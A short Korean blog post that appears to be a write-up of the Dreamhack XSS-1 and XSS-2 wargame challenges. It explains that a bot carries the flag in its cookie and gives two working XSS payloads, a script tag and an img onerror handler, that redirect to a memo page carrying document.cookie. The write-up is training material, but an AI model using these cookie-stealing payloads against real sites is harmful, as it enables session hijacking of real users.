드림핵 XSS-1
사용자가 url을 서버에 제출하면 셀레니움으로 구현된 봇이 해당 url에 접속한다.
이 때 cookie값에 FLAG가 들어있으므로 XSS로 다음과 같이 memo 파라미터로 cookie값을 넘겨주게되면 FLAG를 얻을 수 있다.
<script>
document.location.href = `/memo?memo=${document.cookie}`;
</script>
드림핵 XSS-2
innerHTML로 들어간 script 태그는 실행되지 않기 때문에 img 태그로 했다.
<img src="#" onerror="location.href='/memo?memo='+document.cookie">'Hacking' 카테고리의 다른 글
| Frida (0) | 2025.04.15 |
|---|---|
| 정보 보안 과제 3 (0) | 2025.04.10 |
| 보안 실무 관련 주요 용어, 백엔드 보안 관련 면접 대비 용어 (0) | 2025.03.13 |
| 2025 보안 트렌드와 AI 관련 이슈 (0) | 2025.03.13 |
| 2024 연말정산 / 2025 계획 (0) | 2024.12.17 |